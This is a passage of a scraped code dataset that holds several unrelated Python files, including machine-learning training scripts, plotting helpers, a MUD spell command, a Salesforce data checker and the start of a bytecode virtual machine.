id_shouder[0]\n sl = id_shouder[1]\n ova_len = len(pred)*n_kps\n if pb_type == 'regression':\n shouders_len = ((target[...,sr:sr+1]-target[...,sl:sl+1])**2 + (target[...,sr+n_kps:sr+n_kps+1]-target[...,sl+n_kps:sl+n_kps+1])**2)**0.5\n err = np.abs(pred-target)\n err = (err[...,:n_kps]**2 + err[...,n_kps]**2)**0.5\n err = np.sum(err < shouders_len*thresh)\n elif pb_type == 'detection':\n pred = heatmap2coor(pred, n_kps, img_size, stride)\n target = heatmap2coor(target, n_kps, img_size, stride)\n shouders_len = ((target[:,sr:sr+1,0]-target[:,sl:sl+1,0])**2 + (target[:,sr:sr+1,1]-target[:,sl:sl+1,1])**2)**0.5\n err = np.abs(pred-target)\n err = (err[...,0]**2 + err[...,1]**2)**0.5\n err = np.sum(err < shouders_len*thresh)\n else:\n return None\n return err/ova_len","sub_path":"pcks_numpy.py","file_name":"pcks_numpy.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"371167697","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef imshow_tensor(image, ax=None, mean=0, std=1):\n if ax is None:\n fig, ax = plt.subplots()\n\n image = image.numpy().transpose((1, 2, 0))\n mean = np.array(mean)\n std = np.array(std)\n image = std * image + mean\n image = np.clip(image, 0, 1)\n\n ax.imshow(image)\n plt.axis('off')\n\n return ax, image\n\n\ndef visualize_prediction(image, true_label, labels_predicted, probabilities_predicted):\n plt.subplot(1, 2, 1)\n plt.barh(labels_predicted, probabilities_predicted)\n plt.grid()\n plt.subplot(1, 2, 2)\n show_image(image, f' True label: {true_label}')\n\n\ndef show_image(image, title=None):\n image = plt.imshow(np.asarray(image))\n plt.axis('off')\n if title:\n plt.title(title)\n return image\n","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"359210981","text":"from evennia.commands.default.muxcommand import MuxCommand\n\n\nclass CmdStrike(MuxCommand):\n\n \"\"\"\n +Strike - Call lightning.\n \n Usage: \n +strike \n\n Must be used outside.\n \n \"\"\" \n help_category = \"Forces Magic\"\n auto_help = True\n \n key = \"+strike\"\n locks = \"cmd:all()\"\n\n def func(self):\n if not self.args:\n self.caller.msg(\"You must suply a target for the spell.\")\n return\n hit = self.caller.search(self.args)\n\n if hit == self.caller:\n self.caller.msg(\"You don't want to do that!\")\n return \n if hit:\n hit.msg(\"You are struck by lightning!\")\n self.caller.msg(\"%s is truck by lightning!\" % hit) \n hit.db.conscious = 0\n hit.db.lethal = hit.db.lethal + 4\n healthbar = \"|X|[wHealth:\"\n total = hit.db.lethal + hit.db.bashing\n for i in range(0,8):\n if i < hit.db.lethal:\n healthbar += \" X\"\n elif i < total:\n healthbar += \" /\"\n else:\n healthbar += \" 0\"\n \n hit.msg(prompt=healthbar)\n","sub_path":"arcana/commands/strike.py","file_name":"strike.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"597752056","text":"import gpiozero as gpio\nfrom signal import pause\nimport asyncio\n\nclass InputController():\n def __init__(self, interrupt_pin, input_pin_list):\n self.interrupt = gpio.Button(button_pin, pull_up)\n self.interrupt.on_press = self.on_interrupt\n self.bumpers = {}\n\n self.inputs = {}\n for index, pin in enumerate(input_pin_list):\n button = gpio.Button(pin)\n self.inputs[button] = 2**index\n\n def on_interrupt(self): \n self.bumpers[self.read_inputs()]()\n \n def read_inputs(self):\n return sum([value for button, value \n in self.inputs.items() if button.is_pressed])\n\nclass FakeBumper():\n global_cooldown = 1\n def __init__(self, controller, name, input_number, \n cooldown = global_cooldown): \n self.input_number = input_number\n self.loop = asyncio.get_event_loop()\n self.name = name\n self.controller.bumpers[self.input_number] = self.on_hit\n\n def on_hit(self):\n print('{} was hit!'.format(self.name))\n\n\nbumper1 = FakeBumper('1', 27, 17)\nbumper2 = FakeBumper('2', 6, 5)\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(mainloop(loop))\n","sub_path":"encodedbutton.py","file_name":"encodedbutton.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"220532749","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nimport random\nimport os\nfrom torch.utils import data\nfrom sklearn.model_selection import KFold\nfrom data_loaders import Dataset\nfrom data_augment import DataAugment\nfrom models import Modified3DUNet\nimport torch.nn as nn\nimport time\nfrom losses import DiceLoss\n\n##############################################\n# Code for training the Modified3DUnet model obtained from pykao/Modified-3D-UNet-Pytorch on Github.\n##############################################\n\n# Paths where to load data from and save the models to\n#preprocessed_data_path = r'/home/artur-cmic/Desktop/UCL/Brats2019/Data/Preprocessed'\n#save_model_path = r'/home/artur-cmic/Desktop/UCL/Brats2019/KFold_Validation_V3/Model_Saves'\n#save_losses_path = r'/home/artur-cmic/Desktop/UCL/Brats2019/KFold_Validation_V3'\n\npreprocessed_data_path = r'/home/ajurgens/Brats2019/Data/Preprocessed'\nsave_model_path = r'/home/ajurgens/Brats2019/Model_Saves_V4'\nsave_losses_path = r'/home/ajurgens/Brats2019/'\n\nif not os.path.isdir(save_model_path):\n os.mkdir(save_model_path)\n\n# Use GPU\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda:0\" if use_cuda else \"cpu\")\ntorch.backends.cudnn.benchmark = True\n\n# Get paths and names (IDS) of folders that store the multimodal training data\nfolder_paths = []\nfolder_ids = []\nfor subdir in os.listdir(preprocessed_data_path):\n folder_paths.append(os.path.join(preprocessed_data_path, subdir))\n folder_ids.append(subdir)\n\n# Shuffle them around, keeping same seed to make sure same shuffling is used if training is interrupted and needs to be continued\nrandom.seed(4)\nrandom.shuffle(folder_paths)\nrandom.seed(4)\nrandom.shuffle(folder_ids)\n\n# Training Parameters\nbatch_size = 1\nparams = {'batch_size': batch_size,\n 'shuffle': True,\n 'num_workers': 5}\nmax_epochs = 125\n\n# Model Parameters\nin_channels = 4\nn_classes = 4\nbase_n_filter = 16\n\n# Setup KFold Cross Validation\nn_folds = 5 # Number of folds in cross-validation\nkf = KFold(n_splits=n_folds, shuffle=False) # Shuffle=false to get the same shuffling scheme every run\nfold_nr = 1\n\n# Training Loop\nfor fold in kf.split(folder_paths):\n train_idx = fold[0]\n valid_idx = fold[1]\n train_set = Dataset([folder_paths[i] for i in train_idx], [folder_ids[i] for i in train_idx])\n valid_set = Dataset([folder_paths[i] for i in valid_idx], [folder_ids[i] for i in valid_idx])\n train_loader = data.DataLoader(train_set, **params)\n valid_loader = data.DataLoader(valid_set, **params)\n\n # Model\n model = Modified3DUNet(in_channels, n_classes, base_n_filter)\n if torch.cuda.device_count() > 1:\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\")\n model = nn.DataParallel(model)\n # Loss and optimizer\n #criterion = torch.nn.CrossEntropyLoss().to(device) # For cross entropy\n criterion = DiceLoss() # For dice loss\n optimizer = torch.optim.Adam(model.parameters())\n\n # Load model and optimizer parameters if the training was interrupted and must be continued - need to also change epoch range in for loop\n # checkpoint = torch.load(\"/content/drive/My Drive/Brats2019/Model_Saves_KFold/Fold_1_Epoch_30_Train_Loss_0.0140_Valid_Loss_0.0137.tar\")\n # model.load_state_dict(checkpoint['model_state_dict'])\n model.to(device)\n # optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n #model.train()\n for epoch in range(1, max_epochs + 1):\n start_time = time.time()\n train_losses = []\n for batch, labels in train_loader:\n # Data Augment\n #augmenter = DataAugment(batch,labels)\n #batch,labels = augmenter.augment()\n # Transfer batch and labels to GPU\n batch, labels = batch.to(device), labels.to(device)\n output, seg_layer = model(batch)\n labels = labels.view(-1)\n labels = nn.functional.one_hot(labels, num_classes=4) # For dice loss\n labels = labels.view(-1) # For dice loss\n output = output.view(-1) # For dice loss\n train_loss = criterion.apply(output, labels) # For dice loss\n #train_loss = criterion(output,labels) # For cross entropy\n optimizer.zero_grad()\n train_loss.backward()\n optimizer.step()\n train_losses.append(train_loss.item())\n\n # Get training loss after every epoch\n train_loss_ep = np.mean(train_losses)\n\n # Get validation loss after every epoch\n valid_losses = []\n with torch.no_grad():\n for batch, labels in valid_loader:\n batch, labels = batch.to(device), labels.to(device)\n output, seg_layer = model(batch)\n labels = labels.view(-1)\n labels = nn.functional.one_hot(labels, num_classes=4) # For dice loss\n labels = labels.view(-1) # For dice loss\n output = output.view(-1) # For dice loss\n valid_loss = criterion.apply(output, labels) # For dice loss\n #valid_loss = criterion(output, labels) # For cross entropy\n valid_losses.append(valid_loss.item())\n valid_loss_ep = np.mean(valid_losses)\n elapsed_time = time.time() - start_time\n # Save the training and validation losses to file\n losses_file = open(\"{}/KFold_Losses_V4.txt\".format(save_losses_path), \"a\")\n losses_file.write(\"Fold_{}_Epoch_{}_TrainAvg_{:.4f}_ValidAvg_{:.4f}_TrainLast_{:.4f}_ValidLast_{:.4f}_Time_{}\\n\".format(fold_nr, epoch, train_loss_ep, valid_loss_ep, train_loss.item(), valid_loss.item(), time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time))))\n losses_file.close()\n\n #print('Fold [{}/{}], Epoch [{}/{}], Train Loss: {:.4f}, Valid Loss {:.4f}, Time_{}'.format(fold_nr, n_folds, epoch, max_epochs, train_loss_ep, valid_loss_ep, time.strftime(\"%H:%M:%S\", time.gmtime(elapsed_time))))\n\n # Save the model parameters\n if (epoch % 25 == 0):\n torch.save({'model_state_dict': model.state_dict(), 'optimizer_state_dict': optimizer.state_dict()}, \"{}/Fold_{}_Epoch_{}.tar\".format(save_model_path, fold_nr, epoch))\n fold_nr = fold_nr + 1","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"586595443","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 18 15:10:23 2021\n\n@author: arafa\n\"\"\"\n\nimport requests \nfrom data_in_test import data_in\n\nURL = 'http://127.0.0.1:5000/predict'\n\n# defining a headrers dict for the parameters to be sent to the API\n\nheaders = {'Content-Type' : 'application/json'}\ndata = {'input' : data_in}\n\n# sending get request and saving the response as response object\nr = requests.get(URL, headers = headers, json = data)\n\nr.json()\n","sub_path":"Flask_API/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"170256716","text":"import time\nimport datetime\nimport pickle\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import BayesianRidge\n\n\nclass GameRating:\n def __init__(self,\n file=''):\n # original data\n self.file = file\n\n @staticmethod\n def pre_process(data, to_standardize=False, use_pca=None):\n # define keys of 'genres' and 'categories'\n keys = [ # original features\n 'price', 'purchase_year', 'purchase_month', 'purchase_day', 'release_year', 'release_month',\n 'release_day', 'total_positive_reviews', 'total_negative_reviews',\n # 'price', 'purchase_date', 'release_date', 'total_positive_reviews', 'total_negative_reviews',\n # genres\n 'Action_g', 'Adventure_g', 'Animation & Modeling_g', 'Audio Production_g', 'Casual_g',\n 'Design & Illustration_g', 'Early Access_g', 'Free to Play_g', 'Gore_g', 'Indie_g',\n 'Massively Multiplayer_g', 'Nudity_g', 'RPG_g', 'Racing_g', 'Sexual Content_g', 'Simulation_g',\n 'Sports_g', 'Strategy_g', 'Utilities_g', 'Violent_g',\n # categories\n 'Captions available_c', 'Co-op_c', 'Commentary available_c', 'Cross-Platform Multiplayer_c',\n 'Full controller support_c', 'In-App Purchases_c', 'Includes Source SDK_c', 'Includes level editor_c',\n 'Local Co-op_c', 'Local Multi-Player_c', 'MMO_c', 'Multi-player_c', 'Online Co-op_c',\n 'Online Multi-Player_c', 'Partial Controller Support_c', 'Remote Play on Phone_c',\n 'Remote Play on TV_c', 'Remote Play on Tablet_c', 'Shared/Split Screen_c', 'Single-player_c',\n 'Stats_c', 'Steam Achievements_c', 'Steam Cloud_c', 'Steam Leaderboards_c', 'Steam Trading Cards_c',\n 'Steam Workshop_c', 'SteamVR Collectibles_c', 'VR Support_c', 'Valve Anti-Cheat enabled_c',\n # tags\n '1980s_t', \"1990's_t\", '2.5D_t', '2D_t', '3D_t', '3D Platformer_t', '3D Vision_t', '4 Player Local_t',\n '4X_t', 'ATV_t', 'Action_t', 'Action RPG_t', 'Action-Adventure_t', 'Addictive_t', 'Adventure_t',\n 'Aliens_t', 'Alternate History_t', 'America_t', 'Animation & Modeling_t', 'Anime_t', 'Arcade_t',\n 'Arena Shooter_t', 'Artificial Intelligence_t', 'Assassin_t', 'Atmospheric_t', 'Audio Production_t',\n 'Automation_t', 'Base Building_t', 'Based On A Novel_t', 'Batman_t', 'Battle Royale_t',\n \"Beat 'em up_t\", 'Beautiful_t', 'Benchmark_t', 'Bikes_t', 'Blood_t', 'Board Game_t', 'Building_t',\n 'Bullet Hell_t', 'Bullet Time_t', 'CRPG_t', 'Capitalism_t', 'Card Game_t', 'Cartoon_t', 'Cartoony_t',\n 'Casual_t', 'Cats_t', 'Character Action Game_t', 'Character Customization_t', 'Chess_t',\n 'Choices Matter_t', 'Choose Your Own Adventure_t', 'Cinematic_t', 'City Builder_t', 'Classic_t',\n 'Clicker_t', 'Co-op_t', 'Co-op Campaign_t', 'Colorful_t', 'Comedy_t', 'Comic Book_t',\n 'Competitive_t', 'Conspiracy_t', 'Controller_t', 'Crafting_t', 'Crime_t', 'Crowdfunded_t',\n 'Cult Classic_t', 'Cute_t', 'Cyberpunk_t', 'Dark_t', 'Dark Comedy_t', 'Dark Fantasy_t', 'Dark Humor_t',\n 'Dating Sim_t', 'Demons_t', 'Design & Illustration_t', 'Destruction_t', 'Detective_t', 'Difficult_t',\n 'Dinosaurs_t', 'Diplomacy_t', 'Documentary_t', 'Dragons_t', 'Drama_t', 'Driving_t',\n 'Dungeon Crawler_t', 'Dungeons & Dragons_t', 'Dynamic Narration_t', 'Dystopian_t', 'Early Access_t',\n 'Economy_t', 'Education_t', 'Emotional_t', 'Epic_t', 'Episodic_t', 'Experience_t', 'Experimental_t',\n 'Exploration_t', 'FMV_t', 'FPS_t', 'Family Friendly_t', 'Fantasy_t', 'Fast-Paced_t',\n 'Female Protagonist_t', 'Fighting_t', 'First-Person_t', 'Flight_t', 'Free to Play_t', 'Funny_t',\n 'Futuristic_t', 'Game Development_t', 'Games Workshop_t', 'God Game_t', 'Gore_t',\n 'Gothic_t', 'Grand Strategy_t', 'Great Soundtrack_t', 'Gun Customization_t', 'Hack and Slash_t',\n 'Hacking_t', 'Hand-drawn_t', 'Heist_t', 'Hex Grid_t', 'Hidden Object_t', 'Historical_t', 'Horror_t',\n 'Horses_t', 'Hunting_t', 'Illuminati_t', 'Immersive Sim_t', 'Indie_t',\n 'Intentionally Awkward Controls_t', 'Interactive Fiction_t', 'Inventory Management_t',\n 'Investigation_t', 'Isometric_t', 'JRPG_t', 'Kickstarter_t', 'LGBTQ+_t', 'Lara Croft_t',\n 'Level Editor_t', 'Linear_t', 'Local Co-Op_t', 'Local Multiplayer_t', 'Logic_t', 'Loot_t',\n 'Lovecraftian_t', 'MMORPG_t', 'MOBA_t', 'Magic_t', 'Management_t', 'Mars_t',\n 'Martial Arts_t', 'Massively Multiplayer_t', 'Masterpiece_t', 'Mature_t', 'Mechs_t', 'Medieval_t',\n 'Memes_t', 'Metroidvania_t', 'Military_t', 'Minigames_t', 'Minimalist_t', 'Mod_t', 'Moddable_t',\n 'Motocross_t', 'Motorbike_t', 'Mouse only_t', 'Movie_t', 'Multiplayer_t',\n 'Multiple Endings_t', 'Music_t', 'Music-Based Procedural Generation_t', 'Mystery_t', 'Mythology_t',\n 'Narration_t', 'Nature_t', 'Naval_t', 'Ninja_t', 'Noir_t', 'Nonlinear_t',\n 'Nudity_t', 'Offroad_t', 'Old School_t', 'Online Co-Op_t', 'Open World_t', 'Parkour_t', 'Parody_t',\n 'Party-Based RPG_t', 'Perma Death_t', 'Philisophical_t', 'Physics_t', 'Pirates_t', 'Pixel Graphics_t',\n 'Platformer_t', 'Point & Click_t', 'Political_t', 'Politics_t', 'Post-apocalyptic_t',\n 'Procedural Generation_t', 'Programming_t', 'Psychedelic_t', 'Psychological_t',\n 'Psychological Horror_t', 'Puzzle_t', 'Puzzle-Platformer_t', 'PvE_t', 'PvP_t', 'Quick-Time Events_t',\n 'RPG_t', 'RPGMaker_t', 'RTS_t', 'Racing_t', 'Real Time Tactics_t', 'Real-Time_t',\n 'Real-Time with Pause_t', 'Realistic_t', 'Relaxing_t', 'Remake_t', 'Replay Value_t',\n 'Resource Management_t', 'Retro_t', 'Rhythm_t', 'Robots_t', 'Rogue-like_t', 'Rogue-lite_t',\n 'Romance_t', 'Rome_t', 'Sailing_t', 'Sandbox_t', 'Satire_t', 'Sci-fi_t', 'Science_t', 'Score Attack_t',\n 'Sequel_t', 'Sexual Content_t', \"Shoot 'Em Up_t\", 'Shooter_t', 'Short_t', 'Side Scroller_t',\n 'Silent Protagonist_t', 'Simulation_t', 'Singleplayer_t', 'Sniper_t', 'Snowboarding_t', 'Software_t',\n 'Souls-like_t', 'Soundtrack_t', 'Space_t', 'Space Sim_t', 'Spectacle fighter_t', 'Split Screen_t',\n 'Sports_t', 'Star Wars_t', 'Stealth_t', 'Steampunk_t', 'Story Rich_t', 'Strategy_t', 'Strategy RPG_t',\n 'Stylized_t', 'Submarine_t', 'Superhero_t', 'Supernatural_t', 'Surreal_t', 'Survival_t',\n 'Survival Horror_t', 'Swordplay_t', 'Tactical_t', 'Tactical RPG_t', 'Tanks_t', 'Team-Based_t',\n 'Tennis_t', 'Text-Based_t', 'Third Person_t', 'Third-Person Shooter_t', 'Thriller_t',\n 'Time Manipulation_t', 'Time Travel_t', 'Top-Down_t', 'Top-Down Shooter_t', 'Touch-Friendly_t',\n 'Tower Defense_t', 'Trading_t', 'Trading Card Game_t', 'Trains_t', 'Transhumanism_t',\n 'Transportation_t', 'Turn-Based_t', 'Turn-Based Combat_t', 'Turn-Based Strategy_t',\n 'Turn-Based Tactics_t', 'Twin Stick Shooter_t', 'Typing_t', 'Underground_t', 'Underwater_t',\n 'Unforgiving_t', 'Utilities_t', 'VR_t', 'Villain Protagonist_t', 'Violent_t', 'Visual Novel_t',\n 'Voxel_t', 'Walking Simulator_t', 'War_t', 'Wargame_t', 'Warhammer 40K_t', 'Western_t',\n 'World War I_t', 'World War II_t', 'Zombies_t', 'eSports_t']\n # perform one-hot encoding\n genres_dummies = data['genres'].str.get_dummies(',').rename(lambda x: x + '_g', axis='columns')\n categories_dummies = data['categories'].str.get_dummies(',').rename(lambda x: x + '_c', axis='columns')\n tags_dummies = data['tags'].str.get_dummies(',').rename(lambda x: x + '_t', axis='columns')\n\n # replace 'genres' by 'genres_dummies', as well as replace 'categories' with 'categories_dummies'\n data = pd.concat([data, genres_dummies, categories_dummies, tags_dummies], axis=1)\n\n # convert a date into a datetime\n def date2time(schema='', date=''):\n # define a mapping from english months to numbers\n month2num = {'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06',\n 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12'}\n # convert english months into numbers\n for month, number in month2num.items():\n date = date.replace(month, number)\n # return\n return datetime.datetime.strptime(date, schema)\n\n # replace 'purchase_date'\n data['purchase_date'] = data['purchase_date'].apply(lambda d: date2time(schema='%m %d, %Y', date=d))\n # replace 'release_date'\n data['release_date'] = data['release_date'].apply(lambda d: date2time(schema='%d %m, %Y', date=d))\n\n # decompose 'purchase_date'\n data['purchase_year'] = data['purchase_date'].apply(lambda d: d.year)\n data['purchase_month'] = data['purchase_date'].apply(lambda d: d.month)\n data['purchase_day'] = data['purchase_date'].apply(lambda d: d.day)\n # decompose 'release_date'\n data['release_year'] = data['release_date'].apply(lambda d: d.year)\n data['release_month'] = data['release_date'].apply(lambda d: d.month)\n data['release_day'] = data['release_date'].apply(lambda d: d.day)\n\n # fill NANs\n data['total_positive_reviews'] = data['total_positive_reviews'].fillna(value=0)\n data['total_negative_reviews'] = data['total_negative_reviews'].fillna(value=0)\n\n # deal with the missing key(s)\n for k in keys:\n if data.get(k) is None:\n data[k] = 0\n # sort columns by keys\n data = data[keys]\n\n # perform pca\n if use_pca is not None:\n try:\n # attempt to load a PCA model from disk\n with open('save/pca.pickle', 'rb') as f:\n pca = pickle.load(f)\n except FileNotFoundError:\n # generate a new PCA model\n pca = PCA(n_components=use_pca)\n # fit the model with 'data'\n pca.fit(data)\n # save the model\n with open('save/pca.pickle', 'wb') as f:\n pickle.dump(pca, f)\n # reduce the dimensionality of data\n data = pca.transform(data)\n\n # perform standardization\n if to_standardize:\n try:\n # attempt to load a scaler model from disk\n with open('save/scaler.pickle', 'rb') as f:\n scaler = pickle.load(f)\n except FileNotFoundError:\n # generate a new scaler\n scaler = StandardScaler()\n # fit data\n scaler.fit(data)\n # save the scaler\n with open('save/scaler.pickle', 'wb') as f:\n pickle.dump(scaler, f)\n # apply gaussian standardization\n data = scaler.transform(data)\n\n # return\n return data\n\n def train(self, to_standardize=False, use_pca=None):\n # read data with total length of 357\n data = pd.read_csv('train.csv')\n\n # pre-process data\n modify = self.pre_process(data, to_standardize, use_pca)\n ground_truth = data.get('playtime_forever')\n\n # slice data\n x_train, y_train = modify, ground_truth\n\n tree = DecisionTreeRegressor()\n tree.fit(x_train, y_train)\n\n with open('save/sklearn.pickle', 'wb') as f:\n pickle.dump(tree, f)\n\n @staticmethod\n def predict(to_standardize=False, use_pca=None):\n data = pd.read_csv('test.csv')\n\n # perform standardization\n modify = GameRating.pre_process(data, to_standardize, use_pca)\n\n # slice data\n x_test = modify\n\n # prediction\n with open('save/sklearn.pickle', 'rb') as f:\n tree = pickle.load(f)\n\n playtime = tree.predict(x_test)\n\n data['playtime_forever'] = playtime\n data = data[['id', 'playtime_forever']]\n data['playtime_forever'] = data['playtime_forever'].apply(lambda x: max(x, 0))\n\n data.set_index('id', inplace=True)\n data.to_csv('save/submission.csv')\n\n\nif __name__ == '__main__':\n model = GameRating()\n # model.train(to_standardize=True, use_pca=None)\n\n # GameRating.predict(to_standardize=True, use_pca=None)\n\n df = pd.read_csv('train.csv')\n\n non_zero = df.loc[(df['playtime_forever'] != 0)]\n","sub_path":"attachment/rf_model.py","file_name":"rf_model.py","file_ext":"py","file_size_in_byte":13158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"394510784","text":"\"\"\"\nDefend ability\n\n--\n\nAuthor : DrLarck\n\nLast update : 04/03/20 (DrLarck)\n\"\"\"\n\n# dependancies\nimport asyncio\nimport random\n\n# util\nfrom utility.cog.character.ability.ability import Ability\n\nclass Defend_3(Ability):\n \"\"\"\n Represents the defend ability\n \"\"\"\n\n def __init__(self, client, ctx, caster, target, team_a, team_b):\n Ability.__init__(self, client, ctx, caster, target, team_a, team_b)\n\n self.name = \"Defend\"\n self.description = \"The unit's posture changes to **Defending**.\"\n self.icon = \":shield:\"\n self.id = 3\n\n async def set_tooltip(self):\n self.tooltip = \"The unit's posture changes to **Defending**.\"\n \n async def use(self):\n await self.caster.posture.change_posture(\"defending\")\n\n display = f\"__Move__ : :shield:`{self.name}`\"\n\n return(display)","sub_path":"utility/cog/character/ability/list/_3_defend.py","file_name":"_3_defend.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"241244721","text":"import duckdb\n\ncon = duckdb.connect('robust04db_indexed') \nc = con.cursor()\n\nfor i in range(1,996):\n query = \"COPY terms FROM 'terms\" + str(i) + \".csv' DELIMITER '|'\"\n c.execute(query)\n print(\"Completed \" + str(i) + \" of 995\")\n\nc.close()\ncon.close()\n\n","sub_path":"duckdb_with_index/add_terms.py","file_name":"add_terms.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"634656878","text":"###################################################################################################################################\r\n# This scripts uses a Python package called \"simple salesforce\" to connect to salesforce and use the Salesforce query language \r\n# i.e. very similar to SQL and then traverses the response data strcture to print the Mark in status for an access code in salesforce \r\n# create by Ben,Christina and Sunjeet 14th June,2017\r\n####################################################################################################################################\r\n\r\n\r\n#Simple salesforce package that is being used for this Test script \r\nfrom simple_salesforce import Salesforce\r\nimport ErrorLogging\r\n\r\n\r\n# connect to salesforce sandbox ( regression ) envrionment , using desired user name and password AND secuirty-token that can be retrieved from that SF instance --> \r\n# (under you user name) \"my settings\" hyperlink --> \"personal\" --> \"reset my security token\"\r\n\r\n\r\ndef connectToSalesForceDB(user, pw, token):\r\n sf = Salesforce(username = user, password = pw, security_token = token, sandbox = True)\r\n \r\n return sf\r\n\r\n# run a SOQL query to select the mark in value from a response salesforce object , for a particular access code\r\n# the documentation for exposed APIs can be found in Salesforce from set up --> Build --> create --> Objects \r\ndef checkMarkInFromDB(salesForceConnection, partialQuery, docIdGuidList):\r\n notFoundDataList = []\r\n dataWithErrorList = []\r\n isMarkedIn = False\r\n print(docIdGuidList)\r\n for docIdGuidGuple in docIdGuidList:\r\n query = partialQuery + \"'\" + docIdGuidGuple[0] + \"%\" + \"'\" \r\n print(\"salesforce query: \" + query)\r\n result = salesForceConnection.query_all(query)\r\n print(\"result: \")\r\n print(result)\r\n if (result == None):\r\n notFoundDataList.append(docIdGuidGuple)\r\n else: \r\n record = (result['records'])\r\n if (record != []):\r\n an_dict = record[0] \r\n isMarkedIn = an_dict['Mark_In__c']\r\n if (isMarkedIn != True):\r\n errorDataToBeLogged = (docIdGuidGuple[0], docIdGuidGuple[1], \"Not MarkedIn\")\r\n dataWithErrorList.append(errorDataToBeLogged)\r\n return notFoundDataList, dataWithErrorList\r\n\r\n#This is the main function in this module and calls the other functions.\r\ndef checkDataInSalesForce(user, pw, token, query, docIdGuidList, errorLogLocation, headerList):\r\n sf = connectToSalesForceDB(user, pw, token)\r\n \r\n notFoundDataList, dataWithErrorList = checkMarkInFromDB(sf, query, docIdGuidList)\r\n if (notFoundDataList != [] or dataWithErrorList != []):\r\n ErrorLogging.generateErrorLog(notFoundDataList, dataWithErrorList, \"SalesForce\", errorLogLocation, headerList)\r\n\r\n\r\n\r\n\r\n","sub_path":"CheckSalesForce.py","file_name":"CheckSalesForce.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"460745185","text":"import os\nfrom pickle import NEWFALSE\nfrom bitsnbytes import Byte\nfrom enum import Enum\nfrom typing import Callable, List\n\nfrom inspect import currentframe\n\n\ndef formatlist_items(arr: list, lenght: int) -> list:\n if len(arr) > lenght:\n arr = arr[len(arr)-lenght:]\n arr.insert(0,'...')\n return arr\n\ndef ln(offset=0): return currentframe().f_back.f_lineno - offset\n\ndef checkAddress(self, dest: int): return dest in range(len(self.bytes))\n\ndef OP_NOI(self):\n return\ndef OP_PUSH(self):\n self.push()\n if self.debug: print('│ >>> pushing',self.a)\ndef OP_POP(self):\n self.pop()\n if self.debug: print('│ >>> popping',self.a)\ndef OP_LOAD(self):\n self.ic += 1\n self.a = self.get_constant(self.ip.to_int())\n if self.debug: print('│ >>> loading',self.a,'from constant pool')\ndef OP_LODA(self):\n self.ic += 1\n ptr = self.get_constant(self.ip.to_int())\n if self.debug:\n arr = self.get_array(ptr)\n print('│ >>> loaded array',arr,'with pointer',ptr)\n self.a = ptr\ndef OP_STSI(self):\n self.a = len(self.stack)\n if self.debug: print('│ >>> getting stack size')\ndef OP_SWAP(self):\n old_a = self.a\n self.a = self.pop(doreturn=True)\n self.push(value=old_a, doreturn=True)\n if self.debug: print('│ >>> swapped register with stack top')\n\ndef OP_ADD(self):\n self.pop()\n a = self.a\n self.pop()\n b = self.a\n self.a = a + b\n if self.debug: print('│ >>> adding',a,'and',b)\ndef OP_SUB(self):\n self.pop()\n a = self.a\n self.pop()\n b = self.a\n self.a = a - b\n if self.debug: print('│ >>> subtracting',a,'and',b)\ndef OP_MUL(self):\n self.pop()\n a = self.a\n self.pop()\n b = self.a\n self.a = a * b\n if self.debug: print('│ >>> multiplying',a,'by',b)\ndef OP_DIV(self):\n self.pop()\n a = self.a\n self.pop()\n b = self.a\n self.a = a / b\n if self.debug: print('│ >>> dividing',a,'by',b)\ndef OP_NEG(self):\n if self.debug: print('│ >>> negating',self.a)\n self.a = -self.a\n\ndef OP_INPT(self):\n inp = input()\n try: value = float(inp)\n except ValueError: value = 0\n self.a = value\n if self.debug: print('│ >>> read input',self.a)\ndef OP_PRNT(self):\n if self.debug: print('│ >>> printing',self.a)\n return str(int(self.a) if int(self.a) == self.a else self.a)\ndef OP_PRNC(self):\n if self.debug: print('│ >>> printing character')\n return chr(int(self.a))\ndef OP_PRNA(self):\n # ptr = self.a\n arr = self.get_array(self.a)\n if self.debug: print('│ >>> printing array',arr)\n return '{'+str(arr)[1:-1].replace(' ','')+'}'\ndef OP_PRNS(self):\n arr = self.get_array(self.a)\n string = ''.join([chr(x) for x in arr])\n if self.debug: print('│ >>> printing string',string)\n return string\n\ndef OP_CMP(self):\n self.f = self.a == self.stack[-1]\n if self.debug:\n print('│ >>> comparing',self.a,'with',self.stack[-1])\ndef OP_JMP(self):\n self.ic 